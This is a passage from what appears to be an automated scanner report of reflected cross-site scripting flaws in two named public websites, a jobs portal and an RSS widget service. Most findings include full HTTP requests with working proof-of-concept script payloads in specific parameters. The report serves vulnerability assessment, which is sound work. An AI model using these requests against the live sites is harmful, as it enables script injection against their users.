This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/12541544b8b'%3b0e868ba3cf5/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD HTTP/1.1
Host: europe-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:35:19 GMT
Content-Length: 50860


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://europe-jobs.fins.com/Jobs/12541544b8b';0e868ba3cf5/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&JobId=12541544b8b';0e868ba3cf5&JobName=FX-Sales-Specialist';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
...[SNIP]...

1.55. http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://europe-jobs.fins.com
Path:   /Jobs/125415/FX-Sales-Specialist

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34c8c'%3be375a52b194 was submitted in the REST URL parameter 3. This input was echoed as 34c8c';e375a52b194 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/125415/FX-Sales-Specialist34c8c'%3be375a52b194?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD HTTP/1.1
Host: europe-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:35:54 GMT
Content-Length: 63879


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist34c8c';e375a52b194?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&JobId=125415&JobName=FX-Sales-Specialist34c8c';e375a52b194';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='ht
...[SNIP]...

1.56. http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist [cobrand parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://europe-jobs.fins.com
Path:   /Jobs/125415/FX-Sales-Specialist

Issue detail

The value of the cobrand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26505'-alert(1)-'116ee732501 was submitted in the cobrand parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD26505'-alert(1)-'116ee732501 HTTP/1.1
Host: europe-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:33:48 GMT
Content-Length: 62001


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD26505'-alert(1)-'116ee732501&JobId=125415&JobName=FX-Sales-Specialist';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(OB_Script)!='undefined'
...[SNIP]...

1.57. http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://europe-jobs.fins.com
Path:   /Jobs/125415/FX-Sales-Specialist

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8a35'-alert(1)-'86ecb919995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&e8a35'-alert(1)-'86ecb919995=1 HTTP/1.1
Host: europe-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:34:40 GMT
Content-Length: 63664


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&e8a35'-alert(1)-'86ecb919995=1&JobId=125415&JobName=FX-Sales-Specialist';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(OB_Script)!='undefined
...[SNIP]...

1.58. http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist [reflink parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://europe-jobs.fins.com
Path:   /Jobs/125415/FX-Sales-Specialist

Issue detail

The value of the reflink request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6051f'-alert(1)-'9f8af293c8d was submitted in the reflink parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia6051f'-alert(1)-'9f8af293c8d&cobrand=ATD HTTP/1.1
Host: europe-jobs.fins.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 12:32:55 GMT
Content-Length: 63763


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/JavaScript">
var OB_permalink = 'http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia6051f'-alert(1)-'9f8af293c8d&cobrand=ATD&JobId=125415&JobName=FX-Sales-Specialist';
var OB_Template="fins";
var OB_widgetId = 'SB_1'; //'AR_1';
var OB_langJS ='http://widgets.outbrain.com/lang_en.js';
if ( typeof(OB_Script)!=
...[SNIP]...

1.59. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_css_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 321b0'><script>alert(1)</script>4de901e5125 was submitted in the rssmikle_css_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=321b0'><script>alert(1)</script>4de901e5125&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<link rel='stylesheet' type='text/css' href='321b0'><script>alert(1)</script>4de901e5125' />
...[SNIP]...

1.60. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_font_size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_font_size request parameter is copied into the HTML document as plain text between tags. The payload 4b4c4<script>alert(1)</script>bf4a4e65793 was submitted in the rssmikle_font_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=144b4c4<script>alert(1)</script>bf4a4e65793&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<style type='text/css'>
body{margin:0;padding:0;}
#container{overflow:hidden;margin:0;padding:0;width:240px;height:230px;font-size:144b4c4<script>alert(1)</script>bf4a4e65793px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFF;background-color:#0066FF;background-image:url(http://);}
#header .feed_title{margin:0;
...[SNIP]...

1.61. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_frame_height parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_frame_height request parameter is copied into the HTML document as plain text between tags. The payload 53eea<script>alert(1)</script>db1fb3cd0c6 was submitted in the rssmikle_frame_height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=23053eea<script>alert(1)</script>db1fb3cd0c6&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<style type='text/css'>
body{margin:0;padding:0;}
#container{overflow:hidden;margin:0;padding:0;width:240px;height:23053eea<script>alert(1)</script>db1fb3cd0c6px;font-size:14px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFF;background-color:#0066FF;background-image:url(http://);}
#header .feed_
...[SNIP]...

1.62. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_frame_width parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_frame_width request parameter is copied into the HTML document as plain text between tags. The payload 35a89<script>alert(1)</script>d16cd2cfc2d was submitted in the rssmikle_frame_width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=24035a89<script>alert(1)</script>d16cd2cfc2d&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<style type='text/css'>
body{margin:0;padding:0;}
#container{overflow:hidden;margin:0;padding:0;width:24035a89<script>alert(1)</script>d16cd2cfc2dpx;height:230px;font-size:14px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFF;background-color:#0066FF;background-image:url(http://);}
#
...[SNIP]...

1.63. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_bgcolor parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_bgcolor request parameter is copied into the HTML document as plain text between tags. The payload 567c0<script>alert(1)</script>9c40e50b23f was submitted in the rssmikle_item_bgcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2567c0<script>alert(1)</script>9c40e50b23f&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
or:#FFFFFF;text-decoration:underline;}
#header .feed_title a:active{color:#FFFFFF;text-decoration:none;}
#content{margin:0px;padding:5px 0px 0px 0px;background-color:#C6D0D2567c0<script>alert(1)</script>9c40e50b23f;background-image:url(http://);}
#content .feed_item{margin:0 0 7px 0;padding:0 0 7px 0;border-bottom:1px dashed #CCCCCC;}
#content .feed_item_title{margin:1px 0 1px 3px;pad
...[SNIP]...

1.64. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_bgcolor parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_bgcolor request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6dc9'%3balert(1)//25f736e5d37 was submitted in the rssmikle_item_bgcolor parameter. This input was echoed as f6dc9';alert(1)//25f736e5d37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2f6dc9'%3balert(1)//25f736e5d37&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<PARAM NAME="BGCOLOR" VALUE="#C6D0D2f6dc9';alert(1)//25f736e5d37">
...[SNIP]...

1.65. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_bgimage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_bgimage request parameter is copied into the HTML document as plain text between tags. The payload 8aede<script>alert(1)</script>3fd943d3e7b was submitted in the rssmikle_item_bgimage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

